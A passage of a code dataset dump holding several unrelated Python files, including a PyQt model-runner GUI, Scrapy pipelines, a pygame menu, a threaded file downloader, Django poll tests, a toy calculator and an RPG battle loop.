qgis_input_shp_path=self.chosen_file,\n qgis_output_shapefile_path=self.temp_dir+'shapefile',\n qgis_output_csv_path=self.temp_dir+'csvfile'\n )\n if self.chosen_model and self.chosen_file:\n self.btn_runModel.setEnabled(True)\n else:\n self.btn_runModel.setEnabled(False)\n return\n\n\n def slot_btn_selectModel(self, text):\n mapping = {'Choose Model': None, 'XGBOOST':'xgb','DECISION TREE':'dt','SVM':'svm'}\n self.chosen_model = mapping[text]\n if self.chosen_file and self.chosen_model:\n self.btn_runModel.setEnabled(True)\n else:\n self.btn_runModel.setEnabled(False)\n return\n\n\n def slot_btn_runModel(self):\n self.qgis.run()\n \n mapping = {'xgb':'XGBOOST','dt':'DECISION TREE','svm':'SVM'}\n QMessageBox.information(self, 'info1', 'Running {}, please wait'.format(mapping[self.chosen_model]))\n\n self.btn_runModel.setEnabled(False)\n self.btn_chooseFile.setEnabled(False)\n self.btn_selectModel.setEnabled(False)\n\n self.output = main_predict(self.temp_dir+'csvfile', self.chosen_model)\n rmtree(self.temp_dir)\n 
self.btn_runModel.setEnabled(True)\n        self.btn_chooseFile.setEnabled(True)\n        self.btn_selectModel.setEnabled(True)\n        if self.output[0] == False:\n            QMessageBox.information(self, 'info3', 'No such a file in selected path: {}.csv'.format(self.output[1]))\n        else:\n            self.has_result = True\n            if self.save_path:\n                self.btn_exportResult.setEnabled(True)\n            QMessageBox.information(self, 'info1', 'Running {} finished'.format(mapping[self.chosen_model]))\n        return\n\n    def slot_btn_exportResult(self):\n        QMessageBox.information(self, 'info2', 'Results are saved in \\n{}'.format(self.save_path))\n        yea, mon, day, hou, minu, sec = list(time.localtime())[:6]\n        name = '/PAWS%d_%02d_%02d_%02d_%02d_%02d.asc'%(yea, mon, day, hou, minu, sec)\n        main_prep_qgis(self.output, self.save_path+name)\n        pic = np.loadtxt(self.save_path+name, skiprows=6)\n        plt.imshow(pic)\n        plt.savefig(self.save_path+name.replace('asc','png'))\n        return\n\n    def slot_btn_chooseDir(self):\n        dir_choose = QFileDialog.getExistingDirectory(self, \n                                                    \"Choose Path\", \n                                                    self.cwd) \n\n        self.save_path = dir_choose\n        self.btn_chooseDir.setText(dir_choose)\n        if self.save_path and self.has_result:\n            self.btn_exportResult.setEnabled(True)\n        return\n\n\n\n\n    def closeEvent(self, event): \n        reply = QMessageBox.question(self,\n                                     'exit',\n                                     \"Do you want to exit?\",\n                                     QMessageBox.Yes | QMessageBox.No,\n                                     QMessageBox.No)\n        if reply == QMessageBox.Yes:\n            event.accept()\n        else:\n            event.ignore()\n\n\n\nif __name__==\"__main__\":\n    app = QApplication(sys.argv)\n    mainForm = MainForm('Demo V1.0')\n    mainForm.show()\n    sys.exit(app.exec_())\n","sub_path":"Application/toy_model/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":6347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"494551122","text":"#!/usr/bin/python3\n\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom scrapy.http import Request\nfrom cnblogs_spider.items import CnblogsSpiderArticleItem,CnblogsSpiderAuthorItem,CnblogsSpiderAuthorAvatarItem\nfrom cnblogs_spider.mongodb_pipelines.mongodb_operate import mongodb_operate\nfrom scrapy.exceptions import DropItem\n\nclass Mongodb_Pipelines(object):\n    # This is an ordinary pipeline; it does not support downloading user avatars\n    def process_item(self, item, spider):\n        if isinstance(item, CnblogsSpiderAuthorItem):\n            # assemble a dict\n            # print(\"keys={}\".format(item.keys()))\n            # print(\"type=\",type(item.items()))\n            auser = {}\n            for akey in item.keys():\n                auser[akey] = item[akey]\n            print(\"auser=\",auser)\n            if mongodb_operate.IsAuthorAccountNameExist(item[\"AuthorAccountName\"]) == 0:\n                mongodb_operate.InsertAccount(auser)\n            raise DropItem(\"Stopped in the first pipeline\")\n        else:\n            return item\n\nclass Images_Pipelines(ImagesPipeline):\n    # This is the image pipeline\n    def get_media_requests(self, item, info):\n        if isinstance(item, CnblogsSpiderAuthorAvatarItem):\n            picurl = 'http:'+ item['AuthorPicUrl']\n            # print('picurl=',picurl)\n            yield Request(picurl)\n        else:\n            return item\n\n    def item_completed(self, results, item, info):\n        if isinstance(item, CnblogsSpiderAuthorAvatarItem):\n            item['AuthorPicLocalPath'] = [x['path'] for ok, x in results if ok]\n            if len(item['AuthorPicLocalPath']) == 0:\n                print(\"Failed to download avatar for user {}, url: {}\".format(item['AuthorAccountName'], item['AuthorPicUrl']))\n            else:\n                # write to the database\n                print(\"Successfully downloaded avatar for user {}, url: {}\".format(item['AuthorAccountName'], item['AuthorPicUrl']))\n                auser = {}\n                for akey in item.keys():\n                    auser[akey] = item[akey]\n                mongodb_operate.InsertAccountAvatar(auser)\n            raise DropItem(\"Stopped in the second pipeline\")\n        else:\n            return 
item","sub_path":"cnblogs_spider/mongodb_pipelines/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"356390200","text":"def ft_len(str):\n a = 0\n for i in str:\n a += 1\n return a\n\n\ndef ft_odd_even_analysis_lst(lst):\n d = ft_len(lst)\n i = 0\n k2 = 0\n mx2 = lst[0]\n mn2 = lst[0]\n sum2 = 0\n k1 = 0\n mx1 = lst[1]\n mn1 = lst[1]\n sum1 = 0\n while d > i:\n if lst[i] % 2 == 0:\n k2 = k2 + 1\n if lst[i] > mx2:\n mx2 = lst[i]\n if lst[i] < mn2:\n mn2 = lst[i]\n sum2 = sum2 + lst[i]\n i = i + 1\n else:\n k1 = k1 + 1\n if lst[i] > mx1:\n mx1 = lst[i]\n if lst[i] < mn1:\n mn1 = lst[i]\n sum1 = sum1 + lst[i]\n i = i + 1\n print(\"Анализ списка:\\n\"\n \"Количество четных чисел:{},\\t\\tКоличество нечетных чисел:{},\\n\"\n \"Максимальная четная цифра:{},\\t\\tМаксимальная нечетная цифра:{},\\n\"\n \"Минимальная чентая цифра:{},\\t\\tМинимальная четная цифра:{},\\n\"\n \"Сумма четных чисел:{},\\t\\tСумма нечетных чисел:{},\"\n \"\".format(k2, k1, mx2, mx1, mn2, mn1, sum2, sum1))\n","sub_path":"ft_odd_even_analysis_lst.py","file_name":"ft_odd_even_analysis_lst.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"71247391","text":"import pygame\r\nimport pygame.gfxdraw\r\nimport game\r\nimport deco\r\nimport os\r\n\r\nclass MainMenuSurface(object):\r\n def __init__(self, game, *args, **kwargs):\r\n self.game = game # reference to game object\r\n\r\n self.surface = pygame.Surface(\r\n size = self.game.screen.get_size()\r\n )\r\n\r\n self.POINTER_INDEX = 0 # We're going to use this for our menu control\r\n self.LIST_MENU_OPTIONS = {\r\n \"New Game\" : self.game.start_new_game,\r\n 'Load Game' : self.load_game_screen,\r\n \"Settings\" : self.load_settings_manager,\r\n \"Exit\" : pygame.quit\r\n }\r\n self.LIST_MENU_POINT_POSITIONS = {\r\n # ID : Height\r\n }\r\n\r\n self.SECRET_PHRASE = []\r\n self.MENU_CUSTOM_TITLE_FONT = pygame.font.Font(\"./assets/pixellife.TTF\", 56)\r\n self.TITLE = \"FORSAKEN\"\r\n\r\n self.logo = pygame.image.load(\r\n './assets/logo.png'\r\n ).convert()\r\n\r\n self.background = pygame.image.load(os.path.join('assets', 'placeholder-backdrop.png')).convert()\r\n\r\n def event_hook(self, event):\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_DOWN:\r\n self.POINTER_INDEX += 1 if self.POINTER_INDEX+1 < len(self.LIST_MENU_OPTIONS) else 0\r\n self.game.SoundHandle.attempt_play('menuswitch')\r\n elif event.key == pygame.K_UP:\r\n self.POINTER_INDEX -= 1 if self.POINTER_INDEX > 0 else 0\r\n self.game.SoundHandle.attempt_play('menuswitch')\r\n elif event.key == pygame.K_RETURN:\r\n # TODO: Make the text in the menu flash or something i don't know\r\n self.game.SoundHandle.attempt_play('menuselectdrastic')\r\n\r\n self.game.WindowHandle.do_with_fade(\r\n list(self.LIST_MENU_OPTIONS.values())[self.POINTER_INDEX]\r\n )\r\n\r\n self.SECRET_PHRASE.append(pygame.key.name(event.key))\r\n\r\n if len(self.SECRET_PHRASE) > 3:\r\n self.SECRET_PHRASE.pop(0)\r\n\r\n if self.SECRET_PHRASE == list('pog'):\r\n self.background = pygame.image.load(\r\n './assets/pog.jpg'\r\n ).convert()\r\n self.TITLE = \"POGGERS BRO\"\r\n\r\n def load_game_screen(self):\r\n print(\"not implemented yet again\")\r\n\r\n def load_settings_manager(self):\r\n print(\"no implemented settings\")\r\n\r\n def get_surface_menu_list(self):\r\n text_labels = []\r\n for index, o 
in enumerate(self.LIST_MENU_OPTIONS.keys()):\r\n            sur = self.game.LARGE_FONT.render(\r\n                o, # Text,\r\n                True, # Antialias\r\n                \"grey\", # Color of text\r\n                None if self.POINTER_INDEX != index else pygame.color.Color(30, 30, 30, a=70)\r\n            )\r\n            text_labels.append(sur)\r\n\r\n        longest_width = 0\r\n        tallest_height = 0\r\n        for label in text_labels:\r\n            if label.get_width() > longest_width:\r\n                longest_width = label.get_width()\r\n\r\n            if label.get_height() > tallest_height:\r\n                tallest_height = label.get_height() + 4\r\n\r\n        total_height = tallest_height * len(text_labels) + (8 * len(text_labels))\r\n        total_width = longest_width + 8\r\n\r\n        menu_surface = pygame.Surface(\r\n            (\r\n                total_width,\r\n                total_height\r\n            ),\r\n            pygame.SRCALPHA\r\n        )\r\n\r\n        #menu_surface.fill(pygame.Color(0, 0, 0, a=255))\r\n        for index, o in enumerate(text_labels, start=0):\r\n            h = index * tallest_height + 8\r\n            self.LIST_MENU_POINT_POSITIONS[index] = h\r\n            menu_surface.blit(\r\n                o,\r\n                (4, h)\r\n            )\r\n\r\n        return menu_surface\r\n\r\n    def draw_surface(self):\r\n        self.surface.fill(\r\n            'white'\r\n        )\r\n\r\n        self.surface.blit(\r\n            pygame.transform.scale(\r\n                self.background,\r\n                (self.surface.get_width(), self.surface.get_height())\r\n            ),\r\n            (0, 0)\r\n        )\r\n\r\n        olSur = pygame.Surface(\r\n            (\r\n                self.surface.get_width(),\r\n                self.surface.get_height()\r\n            ),\r\n            pygame.SRCALPHA\r\n        )\r\n\r\n        pygame.gfxdraw.filled_trigon(\r\n            olSur,\r\n            0, -100, round(self.surface.get_width() / 2), self.surface.get_height(), 0, self.surface.get_height(), pygame.color.Color(30, 30, 30)\r\n        )\r\n\r\n        olSur.set_alpha(120)\r\n\r\n        self.surface.blit(olSur, (0, 0))\r\n\r\n\r\n        x=self.MENU_CUSTOM_TITLE_FONT.render(\r\n            self.TITLE, True, 'white'\r\n        )\r\n        self.surface.blit(\r\n            x,\r\n            (\r\n                (self.surface.get_width() - x.get_width()) / 4,\r\n                (self.surface.get_height() - x.get_height()) / 7\r\n            )\r\n        )\r\n\r\n        sml = self.get_surface_menu_list()\r\n        self.surface.blit(\r\n            sml,\r\n            (\r\n                (self.surface.get_width() - sml.get_width()) / 4,\r\n                (self.surface.get_height() - sml.get_height()) / 2\r\n            )\r\n        )\r\n\r\n        self.game.screen.blit(self.surface, (0, 0))\r\n","sub_path":"surfaces/startmenu.py","file_name":"startmenu.py","file_ext":"py","file_size_in_byte":5259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"300924958","text":"# Note: This code will not work on online IDE\n\n# Importing the required packages\nimport click\nimport requests\nimport threading\n\n\n# The below code is used for each chunk of file handled\n# by each thread for downloading the content from specified\n# location to storage\ndef Handler(start, end, url, filename):\n    # specify the starting and ending of the file\n    headers = {'Range': 'bytes=%d-%d' % (start, end)}\n\n    # request the specified part and get into variable\n    r = requests.get(url, headers=headers, stream=True)\n\n    # open the file and write the content of the html page\n    # into file.\n    with open(filename, \"r+b\") as fp:\n        fp.seek(start)\n        var = fp.tell()\n        fp.write(r.content)\n\n\n# Note: This code will not work on online IDE\n\n@click.command(help=\"It downloads the specified file with specified name\")\n@click.option('--number_of_threads', default=4, help=\"No of Threads\")\n@click.option('--name', type=click.Path(), help=\"Name of the file with extension\")\n@click.argument('url_of_file', type=click.Path())\n@click.pass_context\n\ndef download_file(ctx, url_of_file, name, number_of_threads):\n    r = requests.head(url_of_file)\n    if name:\n        file_name = name\n    
else:\n        file_name = url_of_file.split('/')[-1]\n    try:\n        file_size = int(r.headers['content-length'])\n    except:\n        print(\"Invalid URL\")\n        return\n\n    part = int(file_size) // number_of_threads\n    fp = open(file_name, \"wb\")\n    fp.write(b'\\0' * file_size)\n    fp.close()\n\n    for i in range(number_of_threads):\n        start = part * i\n        end = start + part\n\n        # create a Thread with start and end locations\n        t = threading.Thread(target=Handler,\n                             kwargs={'start': start, 'end': end, 'url': url_of_file, 'filename': file_name})\n        t.setDaemon(True)\n        t.start()\n\n","sub_path":"downloadManager/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"100002128","text":"from django.test import TestCase, RequestFactory\nfrom django.urls import reverse\nfrom django.db import IntegrityError\nfrom rest_framework import status\nfrom rest_framework.exceptions import ErrorDetail\nfrom datetime import datetime\nimport pytz\nimport json\nfrom polls.models import *\nfrom accounts.models import *\nfrom django.contrib.auth.models import AnonymousUser\nfrom polls.serializers import * \n\n# Create your tests here.\n\ndef createTestAuthor():\n    n = len(User.objects.all()) + 1\n    author = User.objects.create_user(\n        email=f\"test{n}@email.com\",\n        password=\"password\",\n        first_name=f\"TestFirst{n}\", \n        last_name=f\"TestLast{n}\")\n    return author\n\ndef createTestPoll():\n    npolltimes = 3\n    nparticipants = 4\n    n = len(User.objects.all()) + 1\n    author = createTestAuthor()\n    poll = Poll.objects.create(\n        name=f\"TestPoll{n}\", \n        author=author, \n        location=f\"TestLocation{n}\", \n        notes=f\"TestNotes{n}\", \n        timezone=f\"TestTimezone{n}\")\n    timezone = pytz.timezone(\"America/New_York\")\n    polltimes = [\n        PollTime.objects.create(\n            poll=poll, \n            start=datetime(2018, 5, i+1, 20, 00, tzinfo=timezone), \n            end=datetime(2018, 5, i+1, 21, 00, tzinfo=timezone)) \n        for i in range(npolltimes)]\n    participants = [\n        Participant.objects.create(\n            poll=poll, \n            name=f\"Participant{i}\")\n        for i in range(nparticipants)]\n    [[Availability.objects.create(\n        participant=participant, \n        polltime=polltime, \n        availability=\"N\") \n        for participant in participants]\n        for polltime in polltimes]\n    return poll\n\nclass UserModelTest(TestCase):\n    def test_unique_email(self):\n        with self.assertRaises(IntegrityError):\n            User.objects.create_user(email=\"user@user.com\", password=\"password\", first_name=\"User1\", last_name=\"User1\")\n            User.objects.create_user(email=\"user@user.com\", password=\"password\", first_name=\"User2\", last_name=\"User2\")\n\nclass ParticipantSerializerTests(TestCase):\n    def setUp(self):\n        self.test_poll = createTestPoll()\n\n    def test_serialize_participant(self):\n        participant = self.test_poll.participants.first()\n        expected_participant_data = {\n            \"id\": participant.id,\n            \"poll\": participant.poll.id,\n            \"name\": participant.name,\n            \"availability\": [\n                {\"polltime\": availability.polltime.id, \"availability\": availability.availability} \n                for availability in participant.availability.all()] \n        }\n        serializer = ParticipantSerializer(participant)\n        self.assertEqual(serializer.data, expected_participant_data)\n\n    def test_deserialize_missing_poll(self):\n        polltimes = self.test_poll.polltimes.all()\n        new_participant_data = {\n            \"name\": \"New Participant\",\n            \"availability\": [\n                {\"polltime\": polltime.id, \"availability\": \"Y\"} \n                for polltime in polltimes] \n        }\n        expected_error = {'poll': 
[ErrorDetail(string='This field is required.', code='required')]}\n serializer = ParticipantSerializer(data = new_participant_data)\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors, expected_error)\n \n def test_deserialize_missing_name(self):\n polltimes = self.test_poll.polltimes.all()\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"availability\": [\n {\"polltime\": polltime.id, \"availability\": \"Y\"} \n for polltime in polltimes] \n }\n expected_error = {'name': [ErrorDetail(string='This field is required.', code='required')]}\n serializer = ParticipantSerializer(data = new_participant_data)\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors, expected_error)\n\n def test_deserialize_missing_availability(self):\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n }\n expected_error = {'availability': [ErrorDetail(string='This field is required.', code='required')]}\n serializer = ParticipantSerializer(data = new_participant_data)\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors, expected_error)\n\n def test_validate_update_wrong_poll(self):\n self.test_poll2 = createTestPoll()\n participant = self.test_poll.participants.first()\n updated_participant_data = {\n \"id\": participant.id,\n \"poll\": self.test_poll2.id, # Wrong poll ID\n \"name\": participant.name,\n \"availability\": [\n {\"polltime\": availability.polltime.id, \"availability\": availability.availability} \n for availability in participant.availability.all()] \n }\n expected_error = {'poll': [ErrorDetail(string='Provided poll does not match poll currently associated with participant', code='invalid')]}\n serializer = ParticipantSerializer(participant, data = updated_participant_data)\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors, expected_error)\n\n def test_validate_wrong_nr_polltimes(self):\n polltime = self.test_poll.polltimes.first()\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n \"availability\": [{ \"polltime\": polltime.id, \"availability\": \"Y\"}] # Only one polltime\n }\n expected_error = {'availability': [ErrorDetail(string='Participant availability contains incorrect number of poll times', code='invalid')]}\n serializer = ParticipantSerializer(data = new_participant_data)\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors, expected_error)\n\n def test_validate_polltimes_wrong_order(self):\n polltimes = self.test_poll.polltimes.all()\n npolltimes = len(polltimes)\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n \"availability\": [\n {\"polltime\": polltimes[i].id, \"availability\": \"Y\"}\n for i in list(range(1, npolltimes)) + [0]] # Move the 1st polltime at the end\n }\n expected_error = {'availability': [ErrorDetail(string='Participant availability contains the wrong poll times, or in the wrong order', code='invalid')]}\n serializer = ParticipantSerializer(data = new_participant_data)\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors, expected_error)\n\n def test_create_participant(self):\n nparticipants = len(self.test_poll.participants.all())\n polltimes = self.test_poll.polltimes.all()\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n \"availability\": [\n {\"polltime\": polltime.id, \"availability\": \"Y\"} \n for polltime in polltimes] \n }\n 
serializer = ParticipantSerializer(data = new_participant_data)\n self.assertTrue(serializer.is_valid())\n serializer.save()\n updated_participants = list(self.test_poll.participants.all())\n assert(len(updated_participants) == nparticipants+1)\n new_participant = updated_participants[-1]\n assert(new_participant.name == new_participant_data[\"name\"])\n\n def test_update_participant(self):\n participants = self.test_poll.participants.all() \n nparticipants = len(participants)\n participant = participants[0]\n updated_participant_data = {\n \"id\": participant.id,\n \"poll\": participant.poll.id,\n \"name\": \"Updated name\",\n \"availability\": [\n {\"polltime\": availability.polltime.id, \"availability\": \"Y\"} \n for availability in participant.availability.all()] \n }\n serializer = ParticipantSerializer(participant, data = updated_participant_data)\n self.assertTrue(serializer.is_valid())\n serializer.save()\n updated_participants = list(self.test_poll.participants.all())\n assert(len(updated_participants) == nparticipants)\n updated_participant = updated_participants[0]\n assert(updated_participant.name == updated_participant_data[\"name\"])\n assert(updated_participant.availability.first().availability == updated_participant_data[\"availability\"][0][\"availability\"])\n\nclass PollSerializerTests(TestCase):\n def test_create_poll(self):\n new_poll_data = {\n 'name': 'TestPoll1',\n 'location': 'TestLocation1',\n 'notes': 'TestNotes1',\n 'timezone': 'TestTimezone1',\n 'polltimes': [\n {'start': '2018-05-02T00:56:00Z', 'end': '2018-05-02T01:56:00Z'},\n {'start': '2018-05-03T00:56:00Z', 'end': '2018-05-03T01:56:00Z'},\n {'start': '2018-05-04T00:56:00Z', 'end': '2018-05-04T01:56:00Z'}],\n }\n author = createTestAuthor()\n request = RequestFactory().get(\"/\")\n request.user = author\n serializer = PollSerializer(data = new_poll_data, context={\"request\": request})\n self.assertTrue(serializer.is_valid())\n poll = serializer.save()\n self.assertEqual(poll.name, new_poll_data[\"name\"])\n\nclass ParticipatePollViewTests(TestCase):\n\n def setUp(self):\n self.test_poll = createTestPoll()\n self.url = reverse('participate-poll', args=[self.test_poll.id])\n\n def test_post_request_not_json(self):\n test_data = \"Not a JSON\"\n expected_response = {\"detail\": \"Request not valid JSON\"}\n response = self.client.post(self.url, data=test_data, content_type=\"application/json\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(json.loads(response.content), expected_response)\n\n def test_post_wrong_nr_polltimes(self):\n polltime = self.test_poll.polltimes.first()\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n \"availability\": [{ \"polltime\": polltime.id, \"availability\": \"Y\"}] # Only one polltime\n }\n expected_response = {'availability': [ErrorDetail(string='Participant availability contains incorrect number of poll times', code='invalid')]}\n response = self.client.post(self.url, data=new_participant_data, content_type=\"application/json\")\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(json.loads(response.content), expected_response)\n\n def test_post_polltimes_wrong_order(self):\n polltimes = self.test_poll.polltimes.all()\n npolltimes = len(polltimes)\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"name\": \"New Participant\",\n \"availability\": [\n {\"polltime\": polltimes[i].id, \"availability\": \"Y\"}\n for i in list(range(1, npolltimes)) 
+ [0]] # Move the 1st polltime at the end\n        }\n        expected_response = {'availability': [ErrorDetail(string='Participant availability contains the wrong poll times, or in the wrong order', code='invalid')]}\n        response = self.client.post(self.url, data=new_participant_data, content_type=\"application/json\")\n        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n        self.assertEqual(json.loads(response.content), expected_response)\n\n    def test_post_success(self):\n        nparticipants = len(self.test_poll.participants.all())\n        polltimes = self.test_poll.polltimes.all()\n        new_participant_data = {\n            \"poll\": self.test_poll.id,\n            \"name\": \"New Participant\",\n            \"availability\": [\n                {\"polltime\": polltime.id, \"availability\": \"Y\"} \n                for polltime in polltimes] \n        }\n        response = self.client.post(self.url, data=new_participant_data, content_type=\"application/json\")\n        assert(response.status_code == status.HTTP_200_OK)\n        updated_participants = list(self.test_poll.participants.all())\n        assert(len(updated_participants) == nparticipants+1)\n        new_participant = updated_participants[-1]\n        assert(new_participant.name == new_participant_data[\"name\"])\n","sub_path":"polls/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"404939266","text":"'''\nA calculator that parses the expression string by itself\n'''\n\n\ndef isnum(word):\n    return word in '0123456789'\n\ndef issyb(word):\n    return word in '+-*/()'\n\ndef parse(words):\n    wordsl=[]\n    conn=0\n    if len(words)<=1:\n        return words\n    for i in range(len(words)):\n        if isnum(words[i]):\n            if i ==0 or issyb(words[i-1]):\n                conn=i\n            if i==len(words)-1 or issyb(words[i+1]):\n                wordsl.append(int(words[conn:i+1]))\n\n        if words[i]=='-' and issyb(words[i-1]):\n            wordsl.append(words[i])\n\n        elif issyb(words[i]):\n            wordsl.append(words[i])\n    return wordsl\n\ndef calculator(wordsl):\n    # a single number is returned directly\n    if len(wordsl)==1:\n        return wordsl[0]\n\n    # strip parentheses\n    for i in range(len(wordsl)):\n        if wordsl[i]=='(':\n            for j in range(len(wordsl)-1,0,-1):\n                if wordsl[j]==')':\n                    wordsl[i:j+1]=[calculator(wordsl[i+1:j])]\n                    return calculator(wordsl)\n    # handle unary minus\n    for i in range(len(wordsl)):\n        if i==0 and wordsl[i]=='-' or issyb(str(wordsl[i-1])) and wordsl[i]=='-':\n            wordsl[i:i+2]=[-wordsl[i+1]]\n            return calculator(wordsl)\n\n\n    # the four basic arithmetic operations\n    if wordsl[1] == '+':\n        return wordsl[0]+calculator(wordsl[2:])\n    elif wordsl[1] == '-':\n        return wordsl[0]-calculator(wordsl[2:])\n    elif wordsl[1] == '/':\n        wordsl[:3]=[wordsl[0]/wordsl[2]]\n        return calculator(wordsl)\n    elif wordsl[1]=='*':\n        wordsl[:3]=[wordsl[0]*wordsl[2]]\n        return calculator(wordsl)\n\nwordsl=parse('((2+2)/4)/-2')\nprint(wordsl)\n\nprint(calculator(wordsl))\n\n","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"287906684","text":"from . import BlockHeader, BlockBody\nfrom .. 
import Block, v0_1a\n\n\nclass BlockSerializer(v0_1a.BlockSerializer):\n version = BlockHeader.version\n BlockHeaderClass = BlockHeader\n BlockBodyClass = BlockBody\n\n def _serialize(self, block: 'Block'):\n header: BlockHeader = block.header\n block_serialized = super()._serialize(block)\n block_serialized[\"next_leader\"] = header.next_leader.hex_xx()\n return block_serialized\n","sub_path":"loopchain/blockchain/blocks/v0_2/block_serializer.py","file_name":"block_serializer.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"301111907","text":"import json\nfrom .combates.melee import melee\nfrom .combates.magical import magical\nfrom .combatentes import createcombatentes\nfrom ..funcoes.useit import useitem\nfrom ..funcoes.lvlup import lvlup\nfrom .loot import lootar\nfrom ..funcoes.restore import restaurar\n\ndef batalha():\n createcombatentes()\n with open('Beta/data/combatentes.json') as f:\n nomes=json.load(f)\n\n with open('Beta/data/nomes.json') as jo:\n jogadores=json.load(jo)\n\n with open('Beta/data/inventario/armas.json') as h:\n armas=json.load(h)\n\n with open('Beta/data/inventario/armadura.json') as p:\n armadura=json.load(p)\n \n with open('Beta/data/inventario/escudos.json') as q:\n escudos=json.load(q)\n #for pessoa in nomes:\n # print('Nome: ',pessoa,'seus itens:')\n # print(nomes.get(pessoa).get('inventario').get('itens'))\n # print(nomes.get(pessoa).get('inventario').get('gold'))\n n=[]\n v=[]\n i=[]\n a=[]\n q=[]\n auxq=[]\n v2=[]\n a2=[]\n for z in nomes:\n ldva=nomes.get(z).get('inventario').get('arma')\n dva=ldva[0]\n ldvam=nomes.get(z).get('inventario').get('armadura')\n dvam=ldvam[0]\n ldve=nomes.get(z).get('inventario').get('escudo')\n dve=ldve[0]\n if dva in armas: dvat=armas.get(dva).get('int_VEL')\n else: dvat=0\n if dvam in armadura: dvamt=armadura.get(dvam).get('int_VEL')\n else: dvamt=0\n if dve in escudos: dvet=escudos.get(dve).get('int_VEL')\n else: dvet=0\n debuff_vel=dvat+dvamt+dvet\n n.append(z)\n u=nomes.get(z).get('velocidade')+debuff_vel\n u2=(2.71828**((0.0423*u+0.0423)))\n v.append(u)\n v2.append(u)\n i.append(u2)\n a.append(u2)\n if int(u2)<1: q.append(1)\n else: q.append(int(u2))\n a2.append(int(u2))\n auxq.append(int(u2))\n u=0\n u2=0\n v.sort(reverse=True)\n x='s'\n aux=2\n nomedef=z\n print('Combatentes:',n)\n na='0'\n combatentesleft=len(n)\n end=False\n lenn=len(n)\n while x=='s' or x=='sim':\n na=[]\n while u20:# and nm not n[u]:\n print(' ',nm,'/',nomes.get(nm).get('hp'),'of',nomes.get(nm).get('chp')*15,'de vida')\n #print('\\n')\n print('Vez de',n[u],'(',q[u],'ações )')\n action=0\n #print('\\nu:',u)\n #print('\\nu2:',u2)\n #print('\\ni:',i)\n #print('\\nq:',q)\n #print('\\na:',a)\n #print('\\na2:',a2)\n #print('\\nv:',v)\n #print('\\nv2:',v2)\n #print('\\nauxq:',auxq)\n while action=1: auxq[u]=q[u] \n else: auxq[u]=1\n u+=1\n u=0\n auxq.sort()\n while u0:\n if cmana+mana>cmana*15: nomes[per]['mana']=cmana*15\n else: nomes[per]['mana']+=cmana\n while True:\n if end: x='n'\n else: x=input('Deseja continuar o combate?')\n if x=='loot' or x=='lootar' or x=='l' or x=='s' or x=='sim' or x=='n' or x=='nao': break\n else: print('Essa opção não existe')\n xptotal=0\n if x=='loot' or x=='lootar' or x=='l': lootar()\n print('Deseja restaurar os jogadores?')\n res=input()\n for monstro in nomes:\n if not monstro in jogadores and nomes.get(monstro).get('hp')<1:\n xptotal+=nomes.get(monstro).get('dropxp')\n for per in jogadores:\n if x=='loot' or 
